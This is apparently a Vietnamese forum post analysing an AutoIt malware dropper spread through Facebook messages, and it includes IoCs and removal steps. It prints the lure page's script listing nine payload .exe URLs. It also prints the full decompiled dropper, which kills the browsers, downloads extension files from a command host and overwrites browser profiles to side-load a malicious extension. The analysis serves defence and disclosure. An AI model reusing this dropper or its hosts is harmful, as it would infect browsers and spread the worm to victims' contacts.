Bài viết phân tích con malware lây nhiễm qua Facebook.





- Hiện tượng:
1. Nhắn tin nhắn tới danh sách bạn bè trên Facebook, với nội dung một đường link.
2. Khi nhấn vào đường link này sẽ download tệp tin .EXE về máy tính.
3. Khi chạy tệp tin xong, máy tính sẽ bị nhiễm và tiếp tục gửi tin.

Đường link có dạng sau:

https://9b102c9132fc2995f11f-90f5b1ca4ed...#ref=93740

Tin nhắn đến sẽ có hình avatar của người được nhận.


Mã:
// Stage-1 delivery logic recovered from the malicious link page: it picks ONE of
// several S3-hosted payload URLs at random, so blocking a single bucket or URL does
// not stop delivery. Every URL below is an indicator of compromise (IoC) worth
// blocking at the proxy/DNS layer and searching for in browser download history.
// NOTE(review): the "video_watching_mp4_facebook_*.exe" naming is a lure — the file
// is a Windows executable (.exe), not a video.
var exeler = ["https://s3-us-west-2.amazonaws.com/yeslanw232323sdsdsd2sds13/video_watching_mp4_facebook_12222333232122233sd29000421003.exe","https://s3-us-west-2.amazonaws.com/sadask2323s/video_watching_mp4_facebook_1222233323212233sd29000421003.exe","https://s3-us-west-2.amazonaws.com/sadsak2k323s/video_watching_mp4_facebook_122223332322233sd2900042003.exe","https://s3-us-west-2.amazonaws.com/sadsadk21k323s/video_watching_mp4_facebook_1222323222332900042003.exe","https://s3-us-west-2.amazonaws.com/bakbakbak323/video_watching_mp4_facebook_122223332322233sd29000421003.exe","https://s3-us-west-2.amazonaws.com/sadsad21323ss/video_watching_mp4_facebook_133290004003.exe","https://s3-us-west-2.amazonaws.com/sdskdk213s/video_watching_mp4_facebook_12233290004003.exe","https://s3-us-west-2.amazonaws.com/bakbakwsd21323/video_watching_mp4_facebook_122332900042003.exe","https://s3-us-west-2.amazonaws.com/23sds123s/video_watching_mp4_facebook_12222332900042003.exe"];var exem = exeler[Math.floor(Math.random() * (exeler.length))];

Như vậy, nó tự động download một trong các tệp tin trên về máy tính; người nào thực thi tệp sẽ tự cài đặt nó lên máy tính. Hiện tại, tôi đã gặp ít nhất 2 mẫu loại này lây nhiễm trên máy tính. Malware này được viết bằng AutoIt; reverse ra ta được đoạn mã sau:


Mã:
; Analyst notes (defender view) on the decompiled AutoIt dropper below. The listing
; was collapsed onto three lines during extraction; statement boundaries are at each
; "Local", "If", "EndIf", "DirCreate", "InetGet", "FileCopy", "Sleep" and "ShellExecute".
;
; 1. Builds the strings "Chrome", "browser" and "Extensions" one character at a time
;    ($chrxxxx, $browxs, $extsd) — plain string obfuscation against static string
;    matching; the assembled values are what any signature should key on.
; 2. Kills Chrome.exe, browser.exe (presumably Yandex Browser's process — verify) and
;    opera.exe so the profile files below can be overwritten while no browser holds
;    them open. A sudden termination of all three browsers is itself a detection hook.
; 3. Reads an extension id ($okanid) from http://www.patronbayi.com/class.php?idver=true
;    (C2) and creates Extensions\<id> under the Chrome, Yandex and Opera profiles, in
;    both the Vista+ AppData layout and the XP "Documents and Settings" layout.
; 4. Downloads Preferences, background.js and manifest.json from the same host into
;    %USERPROFILE%\file_shared_xs, sets Preferences read-only (+R), then copies the
;    three files over each profile's Preferences and into the new extension folder
;    (FileCopy flag 9 = overwrite + create destination path). Net effect: a browser
;    extension is side-loaded and the profile's Preferences are replaced, presumably
;    so the browser accepts the injected extension — confirm against the fetched files.
; 5. Relaunches Chrome so the injected extension becomes active.
;
; Host IoCs: %USERPROFILE%\file_shared_xs\, an unexpected Extensions\<id> folder and a
; read-only Preferences file in the profiles above. Network IoC: HTTP GETs to
; www.patronbayi.com. No persistence mechanism is visible in this listing; the
; re-messaging behaviour described above would live in the downloaded background.js.
Local $chrxxxx1 = "C"Local $chrxxxx2 = "h"Local $chrxxxx3 = "r"Local $chrxxxx4 = "o"Local $chrxxxx5 = "m"Local $chrxxxx6 = "e"Local $chrxxxx = $chrxxxx1 & $chrxxxx2 & $chrxxxx3 & $chrxxxx4 & $chrxxxx5 & $chrxxxx6Local $browxs1 = "b"Local $browxs2 = "r"Local $browxs3 = "o"Local $browxs4 = "w"Local $browxs5 = "s"Local $browxs6 = "e"Local $browxs7 = "r"Local $browxs = $browxs1 & $browxs2 & $browxs3 & $browxs4 & $browxs5 & $browxs6 & $browxs7Local $extsd1 = "E"Local $extsd2 = "x"Local $extsd3 = "t"Local $extsd4 = "e"Local $extsd5 = "n"Local $extsd6 = "s"Local $extsd7 = "i"Local $extsd8 = "o"Local $extsd9 = "n"Local $extsd0 = "s"Local $extsd = $extsd1 & $extsd2 & $extsd3 & $extsd4 & $extsd5 & $extsd6 & $extsd7 & $extsd8 & $extsd9 & $extsd0If ProcessExists("" & $chrxxxx & ".exe") Then    ProcessClose("" & $chrxxxx & ".exe")EndIfIf ProcessExists("" & $browxs & ".exe") Then    ProcessClose("" & $browxs & ".exe")EndIfIf ProcessExists("opera.exe") Then    ProcessClose("opera.exe")EndIfSleep(100)Local $okanid = BinaryToString(InetRead("http://www.patronbayi.com/class.php?idver=true"))DirCreate(@UserProfileDir & "\AppData\Local\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid)DirCreate(@UserProfileDir & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid)DirCreate(@UserProfileDir & "\AppData\Roaming\Opera Software\Opera Stable\" & $extsd & "\" & $okanid)DirCreate("C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid)DirCreate("C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid)DirCreate("C:\Documents and Settings\" & @UserName & "\Application Data\Opera Software\Opera Stable\" & $extsd & "\" & $okanid)DirCreate(@UserProfileDir & "\file_shared_xs\")Sleep(100)InetGet("http://www.patronbayi.com/Preferences", @UserProfileDir & 
"\file_shared_xs\Preferences", 9)Sleep(50)If NOT FileSetAttrib(@UserProfileDir & "\file_shared_xs\Preferences", "+R") ThenEndIfInetGet("http://www.patronbayi.com/ext/background.js", @UserProfileDir & "\file_shared_xs\background.js", 9)InetGet("http://www.patronbayi.com/manifest.json", @UserProfileDir & "\file_shared_xs\manifest.json", 9)FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", @UserProfileDir & "\AppData\Local\Google\" & $chrxxxx & "\User Data\Default\Preferences", 9)FileCopy(@UserProfileDir & "\file_shared_xs\background.js", @UserProfileDir & "\AppData\Local\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid & "\background.js", 9)FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", @UserProfileDir & "\AppData\Local\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid & "\manifest.json", 9)FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", @UserProfileDir & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\Preferences", 9)FileCopy(@UserProfileDir & "\file_shared_xs\background.js", @UserProfileDir & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid & "\background.js", 9)FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", @UserProfileDir & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid & "\manifest.json", 9)FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", @UserProfileDir & "\AppData\Roaming\Opera Software\Opera Stable\Preferences", 9)FileCopy(@UserProfileDir & "\file_shared_xs\background.js", @UserProfileDir & "\AppData\Roaming\Opera Software\Opera Stable\" & $extsd & "\" & $okanid & "\background.js", 9)FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", @UserProfileDir & "\AppData\Roaming\Opera Software\Opera Stable\" & $extsd & "\" & $okanid & "\manifest.json", 9)FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Google\" & 
$chrxxxx & "\User Data\Default\Preferences", 9)FileCopy(@UserProfileDir & "\file_shared_xs\background.js", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid & "\background.js", 9)FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid & "\manifest.json", 9)FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\Preferences", 9)FileCopy(@UserProfileDir & "\file_shared_xs\background.js", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid & "\background.js", 9)FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid & "\manifest.json", 9)FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", "C:\Documents and Settings\" & @UserName & "\Application Data\Opera Software\Opera Stable\Preferences", 9)FileCopy(@UserProfileDir & "\file_shared_xs\background.js", "C:\Documents and Settings\" & @UserName & "\Application Data\Opera Software\Opera Stable\" & $extsd & "\" & $okanid & "\background.js", 9)FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", "C:\Documents and Settings\" & @UserName & "\Application Data\Opera Software\Opera Stable\" & $extsd & "\" & $okanid & "\manifest.json", 9)Sleep(100)ShellExecute("" & $chrxxxx & ".exe")

Như vậy, nó gửi các request HTTP tới:

Mã:
www.patronbayi.com GET /class.php?idver=true HTTP/1.1
www.patronbayi.com GET /Preferences HTTP/1.1
www.patronbayi.com GET /ext/background.js HTTP/1.1
www.patronbayi.com GET /manifest.json HTTP/1.1

Có nhiều nơi lưu tệp tin thực thi khác nhau, nhưng tôi tìm thấy 2 vị trí được lưu là:

Mã:
C:\TEST\sample.exe và %appdata%sysreg.exe
C:\User\[username]\Program Data\sysreg.exe
C:\f_install.exe

Các bạn search các tệp .EXE trên và xóa đi, sau đó tìm kiếm các thư mục sau:

Mã:
C:\Documents and Settings\User\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\Extensions
C:\Documents and Settings\User\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default
C:\Documents and Settings\User\Local Settings\Application Data\Yandex\YandexBrowser\User Data
C:\Documents and Settings\User\Local Settings\Application Data\Yandex\YandexBrowser
C:\Documents and Settings\User\Local Settings\Application Data\Yandex
C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions
C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\User Data\Default
C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\User Data
C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome
C:\Documents and Settings\User\Local Settings\Application Data\Google
C:\Documents and Settings\User\file_shared_xs
C:\Documents and Settings\User\Application Data\Opera Software\Opera Stable\Extensions
C:\Documents and Settings\User\Application Data\Opera Software\Opera Stable
C:\Documents and Settings\User\Application Data\Opera Software
C:\Documents and Settings\User\AppData\Roaming\Opera Software\Opera Stable\Extensions
C:\Documents and Settings\User\AppData\Roaming\Opera Software\Opera Stable
C:\Documents and Settings\User\AppData\Roaming\Opera Software
C:\Documents and Settings\User\AppData\Roaming
C:\Documents and Settings\User\AppData\Local\Yandex\YandexBrowser\User Data\Default\Extensions
C:\Documents and Settings\User\AppData\Local\Yandex\YandexBrowser\User Data\Default
C:\Documents and Settings\User\AppData\Local\Yandex\YandexBrowser\User Data
C:\Documents and Settings\User\AppData\Local\Yandex\YandexBrowser
C:\Documents and Settings\User\AppData\Local\Yandex
C:\Documents and Settings\User\AppData\Local\Google\Chrome\User Data\Default\Extensions
C:\Documents and Settings\User\AppData\Local\Google\Chrome\User Data\Default
C:\Documents and Settings\User\AppData\Local\Google\Chrome\User Data
C:\Documents and Settings\User\AppData\Local\Google\Chrome
C:\Documents and Settings\User\AppData\Local\Google
C:\Documents and Settings\User\AppData\Local
C:\Documents and Settings\User\AppData

Xóa cả thư mục hoặc 3 tệp tin sau: Preferences, background.js, manifest.json

Hiện tại, mẫu malware này vẫn tiếp tục cập nhật phiên bản mới. Các bạn thường xuyên theo dõi topic để xóa virus. Nếu cần thiết, tôi sẽ viết chương trình để xóa toàn bộ virus khỏi máy nếu có nhiều người mắc phải loại này.  

Tác giả : Hoàng Cường